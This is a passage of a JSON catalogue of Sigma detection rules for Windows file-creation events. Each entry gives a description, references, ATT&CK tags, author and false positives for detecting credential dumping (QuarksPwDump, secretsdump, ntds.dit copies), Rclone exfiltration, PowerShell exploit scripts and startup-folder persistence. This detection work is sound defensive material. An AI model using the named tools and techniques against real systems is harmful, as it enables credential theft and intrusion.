"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_pcre_net_temp_file.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2020/10/29", - "filename": "file_event_win_pcre_net_temp_file.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "uuid": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", - "value": "Pingback Backdoor - File", - "meta": { - "refs": [ - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel", - "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_pingback_backdoor.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1574.001" - ], - "creation_date": "2021/05/05", - "filename": "file_event_win_pingback_backdoor.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Very unlikely" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of known powershell scripts for exploitation", - "uuid": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", - "value": "Malicious PowerShell Commandlet Names", - "meta": { - "refs": [ - "https://raw.githubusercontent.com/Neo23x0/sigma/f35c50049fa896dff91ff545cb199319172701e8/rules/windows/powershell/powershell_malicious_commandlets.yml", - "https://github.com/PowerShellMafia/PowerSploit", - "https://github.com/NetSPI/PowerUpSQL", - "https://github.com/CsEnox/EventViewer-UACBypass", - "https://github.com/AlsidOfficial/WSUSpendu/", - "https://github.com/nettitude/Invoke-PowerThIEf", - 
"https://github.com/S3cur3Th1sSh1t/WinPwn", - "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", - "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", - "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", - "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", - "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", - "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", - "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2018/04/07", - "filename": "file_event_win_powershell_exploit_scripts.yml", - "author": "Markus Neis, Nasreddine Bencherchali, Mustafa Kaan Demir, Georg Lauenstein", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Attempts to detect PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 
2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", - "uuid": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", - "value": "PowerShell Writing Startup Shortcuts", - "meta": { - "refs": [ - "https://redcanary.com/blog/intelligence-insights-october-2021/", - "https://github.com/redcanaryco/atomic-red-team/blob/36d49de4c8b00bf36054294b4a1fcbab3917d7c5/atomics/T1547.001/T1547.001.md#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_startup_shortcuts.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2021/10/24", - "filename": "file_event_win_powershell_startup_shortcuts.yml", - "author": "Christopher Peacock '@securepeacock', SCYTHE", - "level": "high", - "falsepositive": [ - "Unknown", - "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." 
- ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects a dump file written by QuarksPwDump password dumper", - "uuid": "847def9e-924d-4e90-b7c4-5f581395a2b4", - "value": "QuarksPwDump Dump File", - "meta": { - "refs": [ - "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/QuarksPWDump.htm", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_quarkspw_filedump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002" - ], - "creation_date": "2018/02/10", - "filename": "file_event_win_quarkspw_filedump.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects Rclone config file being created", - "uuid": "34986307-b7f4-49be-92f3-e7a4d01ac5db", - "value": "Rclone Config File Creation", - "meta": { - "refs": [ - "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_rclone_exec_file.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567.002" - ], - "creation_date": "2021/05/26", - "filename": "file_event_win_rclone_exec_file.yml", - "author": "Aaron Greetham (@beardofbinary) - NCC Group", - "level": "high", - "falsepositive": [ - "Legitimate Rclone usage (rare)" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects actions caused by the RedMimicry Winnti playbook", - "uuid": "130c9e58-28ac-4f83-8574-0a4cc913b97e", - "value": "RedMimicry Winnti Playbook Dropped File", - "meta": { - "refs": [ - "https://redmimicry.com", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_redmimicry_winnti_filedrop.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027" - 
],
- "creation_date": "2020/06/24",
- "filename": "file_event_win_redmimicry_winnti_filedrop.yml",
- "author": "Alexander Rausch",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.",
- "uuid": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a",
- "value": "Remote Credential Dump",
- "meta": {
- "refs": [
- "https://github.com/Porchetta-Industries/CrackMapExec",
- "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_remote_cred_dump.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003"
- ],
- "creation_date": "2022/11/16",
- "filename": "file_event_win_remote_cred_dump.yml",
- "author": "SecurityAura",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut. If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder. Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.",
- "uuid": "a6976974-ea6f-4e97-818e-ea08625c52cb",
- "value": "RipZip Attack on Startup Folder",
- "meta": {
- "refs": [
- "https://twitter.com/jonasLyk/status/1549338335243534336?t=CrmPocBGLbDyE4p6zTX1cg&s=19",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ripzip_attack.yml"
- ],
- "tags": [
- "attack.t1547",
- "attack.persistence"
- ],
- "creation_date": "2022/07/21",
- "filename": "file_event_win_ripzip_attack.yml",
- "author": "Greg (rule)",
- "level": "high",
- "falsepositive": "No established falsepositives",
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n",
- "uuid": "fec96f39-988b-4586-b746-b93d59fd1922",
- "value": "ScreenConnect Temporary Installation Artefact",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_screenconnect_artefact.yml"
- ],
- "tags": [
- "attack.command_and_control",
- "attack.t1219"
- ],
- "creation_date": "2022/02/13",
- "filename": "file_event_win_screenconnect_artefact.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Legitimate use"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.",
- "uuid": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4",
- "value": "Created Files by Office Applications",
- "meta": {
- "refs": [
- "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/",
- "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_script_creation_by_office_using_file_ext.yml"
- ],
- "tags": [
- "attack.t1204.002",
- "attack.execution"
- ],
- "creation_date": "2021/08/23",
- "filename": "file_event_win_script_creation_by_office_using_file_ext.yml",
- "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects a Windows executable that writes files to suspicious folders",
- "uuid": "1277f594-a7d1-4f28-a2d3-73af5cbeab43",
- "value": "Windows Shell File Write to Suspicious Folder",
- "meta": {
- "refs": [
- "Internal Research",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml"
- ],
- "tags": "No established tags",
- "creation_date": "2021/11/20",
- "filename": "file_event_win_shell_write_susp_directory.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects windows executables that writes files with suspicious extensions",
- "uuid": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62",
- "value": "Windows Binaries Write Suspicious Extensions",
- "meta": {
- "refs": [
- "Internal Research",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_shell_write_susp_files_extensions.yml"
- ],
- "tags": "No established tags",
- "creation_date": "2022/08/12",
- "filename": "file_event_win_shell_write_susp_files_extensions.yml",
- "author": "Nasreddine Bencherchali",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.",
- "uuid": "2aa0a6b4-a865-495b-ab51-c28249537b75",
- "value": "Startup Folder File Write",
- "meta": {
- "refs": [
- "https://github.com/OTRF/detection-hackathon-apt29/issues/12",
- "https://threathunterplaybook.com/evals/apt29/detections/5.B.1_611FCA99-97D0-4873-9E51-1C1BA2DBB40D.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_startup_folder_file_write.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1547.001"
- ],
- "creation_date": "2020/05/02",
- "filename": "file_event_win_startup_folder_file_write.yml",
- "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)",
- "level": "medium",
- "falsepositive": [
- "An FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.",
- "uuid": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb",
- "value": "Suspicious ADSI-Cache Usage By Unknown Tool",
- "meta": {
- "refs": [
- "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961",
- "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/",
- "https://github.com/fox-it/LDAPFragger",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_adsi_cache_usage.yml"
- ],
- "tags": [
- "attack.t1001.003",
- "attack.command_and_control"
- ],
- "creation_date": "2019/03/24",
- "filename": "file_event_win_susp_adsi_cache_usage.yml",
- "author": "xknow @xknow_infosec, Tim Shelton",
- "level": "high",
- "falsepositive": [
- "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc."
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects suspicious .NET assembly executions. Could detect using Cobalt Strike's command execute-assembly.",
- "uuid": "e4b63079-6198-405c-abd7-3fe8b0ce3263",
- "value": "Suspicious CLR Logs Creation",
- "meta": {
- "refs": [
- "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html",
- "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/",
- "https://github.com/olafhartong/sysmon-modular/blob/5e5f6d90819a7f35eec0aba08021d0d201bb9055/11_file_create/include_dotnet.xml",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_clr_logs.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.defense_evasion",
- "attack.t1059.001",
- "attack.t1218"
- ],
- "creation_date": "2020/10/12",
- "filename": "file_event_win_susp_clr_logs.yml",
- "author": "omkar72, oscd.community, Wojciech Lesicki",
- "level": "high",
- "falsepositive": [
- "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\",
- "uuid": "e15b518d-b4ce-4410-a9cd-501f23ce4a18",
- "value": "Suspicious Creation with Colorcpl",
- "meta": {
- "refs": [
- "https://twitter.com/eral4m/status/1480468728324231172?s=20",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_colorcpl.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1564"
- ],
- "creation_date": "2022/01/21",
- "filename": "file_event_win_susp_colorcpl.yml",
- "author": "frack113",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "This rule detects suspicious files created by Microsoft Sync Center (mobsync)",
- "uuid": "409f8a98-4496-4aaa-818a-c931c0a8b832",
- "value": "Created Files by Microsoft Sync Center",
- "meta": {
- "refs": [
- "https://redcanary.com/blog/intelligence-insights-november-2021/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_creation_by_mobsync.yml"
- ],
- "tags": [
- "attack.t1055",
- "attack.t1218",
- "attack.execution",
- "attack.defense_evasion"
- ],
- "creation_date": "2022/04/28",
- "filename": "file_event_win_susp_creation_by_mobsync.yml",
- "author": "elhoim",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder",
- "uuid": "5f87308a-0a5b-4623-ae15-d8fa1809bc60",
- "value": "Suspicious Files in Default GPO Folder",
- "meta": {
- "refs": [
- "https://redcanary.com/blog/intelligence-insights-november-2021/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_default_gpo_dir_write.yml"
- ],
- "tags": [
- "attack.t1036.005",
- "attack.defense_evasion"
- ],
- "creation_date": "2022/04/28",
- "filename": "file_event_win_susp_default_gpo_dir_write.yml",
- "author": "elhoim",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension",
- "uuid": "fc4f4817-0c53-4683-a4ee-b17a64bc1039",
- "value": "Suspicious Desktopimgdownldr Target File",
- "meta": {
- "refs": [
- "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/",
- "https://twitter.com/SBousseaden/status/1278977301745741825",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1105"
- ],
- "creation_date": "2020/07/03",
- "filename": "file_event_win_susp_desktopimgdownldr_file.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "False positives depend on scripts and administrative tools used in the monitored environment"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.",
- "uuid": "81315b50-6b60-4d8f-9928-3466e1022515",
- "value": "Suspicious desktop.ini Action",
- "meta": {
- "refs": [
- "https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktop_ini.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1547.009"
- ],
- "creation_date": "2020/03/19",
- "filename": "file_event_win_susp_desktop_ini.yml",
- "author": "Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)",
- "level": "medium",
- "falsepositive": [
- "Operations performed through Windows SCCM or equivalent",
- "Read only access list authority"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Ransomware create txt file in the user Desktop",
- "uuid": "caf02a0a-1e1c-4552-9b48-5e070bd88d11",
- "value": "Suspicious Creation TXT File in User Desktop",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1486/T1486.md#atomic-test-5---purelocker-ransom-note",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktop_txt.yml"
- ],
- "tags": [
- "attack.impact",
- "attack.t1486"
- ],
- "creation_date": "2021/12/26",
- "filename": "file_event_win_susp_desktop_txt.yml",
- "author": "frack113",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)",
- "uuid": "3d0ed417-3d94-4963-a562-4a92c940656a",
- "value": "Creation of a Diagcab",
- "meta": {
- "refs": [
- "https://threadreaderapp.com/thread/1533879688141086720.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_diagcab.yml"
- ],
- "tags": [
- "attack.resource_development"
- ],
- "creation_date": "2022/06/08",
- "filename": "file_event_win_susp_diagcab.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Legitimate microsoft diagcab"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.",
- "uuid": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e",
- "value": "Suspicious Double Extension Files",
- "meta": {
- "refs": [
- "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/",
- "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations",
- "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles",
- "https://twitter.com/malwrhunterteam/status/1235135745611960321",
- "https://twitter.com/luc4m/status/1073181154126254080",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_double_extension.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1036.007"
- ],
- "creation_date": "2022/06/19",
- "filename": "file_event_win_susp_double_extension.yml",
- "author": "Nasreddine Bencherchali, frack113",
- "level": "high",
- "falsepositive": [
- "Unlikely"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the creation of an executable by another executable",
- "uuid": "297afac9-5d02-4138-8c58-b977bac60556",
- "value": "Creation of an Executable by an Executable",
- "meta": {
- "refs": [
- "Malware Sandbox",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_dropper.yml"
- ],
- "tags": [
- "attack.resource_development",
- "attack.t1587.001"
- ],
- "creation_date": "2022/03/09",
- "filename": "file_event_win_susp_dropper.yml",
- "author": "frack113",
- "level": "low",
- "falsepositive": [
- "Software installers",
- "Update utilities"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation",
- "uuid": "7280c9f3-a5af-45d0-916a-bc01cb4151c9",
- "value": "Suspicious MSExchangeMailboxReplication ASPX Write",
- "meta": {
- "refs": [
- "https://redcanary.com/blog/blackbyte-ransomware/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_exchange_aspx_write.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "attack.persistence",
- "attack.t1505.003"
- ],
- "creation_date": "2022/02/25",
- "filename": "file_event_win_susp_exchange_aspx_write.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.",
- "uuid": "74babdd6-a758-4549-9632-26535279e654",
- "value": "Suspicious Executable File Creation",
- "meta": {
- "refs": [
- "https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae",
- "https://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_executable_creation.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1564"
- ],
- "creation_date": "2022/09/05",
- "filename": "file_event_win_susp_executable_creation.yml",
- "author": "frack113",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n",
- "uuid": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b",
- "value": "Suspicious Get-Variable.exe Creation",
- "meta": {
- "refs": [
- "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/",
- "https://www.joesandbox.com/analysis/465533/0/html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_get_variable.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1546",
- "attack.defense_evasion",
- "attack.t1027"
- ],
- "creation_date": "2022/04/23",
- "filename": "file_event_win_susp_get_variable.yml",
- "author": "frack113",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects dropped files with LNK double extension, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.",
- "uuid": "3215aa19-f060-4332-86d5-5602511f3ca8",
- "value": "Suspicious LNK Double Extension Files",
- "meta": {
- "refs": [
- "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/",
- "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations",
- "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles",
- "https://twitter.com/malwrhunterteam/status/1235135745611960321",
- "https://twitter.com/luc4m/status/1073181154126254080",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1036.007"
- ],
- "creation_date": "2022/11/07",
- "filename": "file_event_win_susp_lnk_double_extension.yml",
- "author": "Nasreddine Bencherchali, frack113",
- "level": "medium",
- "falsepositive": [
- "Users creating a shortcut on e.g. desktop"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file",
- "uuid": "11b1ed55-154d-4e82-8ad7-83739298f720",
- "value": "Suspicious Process Writes Ntds.dit",
- "meta": {
- "refs": [
- "https://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/",
- "https://adsecurity.org/?p=2398",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_ntds_dit.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.002",
- "attack.t1003.003"
- ],
- "creation_date": "2022/01/11",
- "filename": "file_event_win_susp_ntds_dit.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.",
- "uuid": "dca1b3e8-e043-4ec8-85d7-867f334b5724",
- "value": "Suspicious PFX File Creation",
- "meta": {
- "refs": [
- "https://github.com/OTRF/detection-hackathon-apt29/issues/14",
- "https://threathunterplaybook.com/evals/apt29/detections/6.B.1_6392C9F1-D975-4F75-8A70-433DEDD7F622.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_pfx_file_creation.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1552.004"
- ],
- "creation_date": "2020/05/02",
- "filename": "file_event_win_susp_pfx_file_creation.yml",
- "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)",
- "level": "medium",
- "falsepositive": [
- "System administrators managing certififcates."
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence",
- "uuid": "b5b78988-486d-4a80-b991-930eff3ff8bf",
- "value": "PowerShell Profile Modification",
- "meta": {
- "refs": [
- "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/",
- "https://persistence-info.github.io/Data/powershellprofile.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_powershell_profile.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.privilege_escalation",
- "attack.t1546.013"
- ],
- "creation_date": "2019/10/24",
- "filename": "file_event_win_susp_powershell_profile.yml",
- "author": "HieuTT35, Nasreddine Bencherchali",
- "level": "high",
- "falsepositive": [
- "System administrator create Powershell profile manually"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.\nThis driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.\n",
- "uuid": "3da70954-0f2c-4103-adff-b7440368f50e",
- "value": "Suspicious PROCEXP152.sys File Created In TMP",
- "meta": {
- "refs": [
- "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml"
- ],
- "tags": [
- "attack.t1562.001",
- "attack.defense_evasion"
- ],
- "creation_date": "2019/04/08",
- "filename": "file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml",
- "author": "xknow (@xknow_infosec), xorxes (@xor_xes)",
- "level": "medium",
- "falsepositive": [
- "Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it."
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the creation of suspcious binary files inside the \"\\windows\\system32\\spool\\drivers\\color\\\" as seen in the blog referenced below",
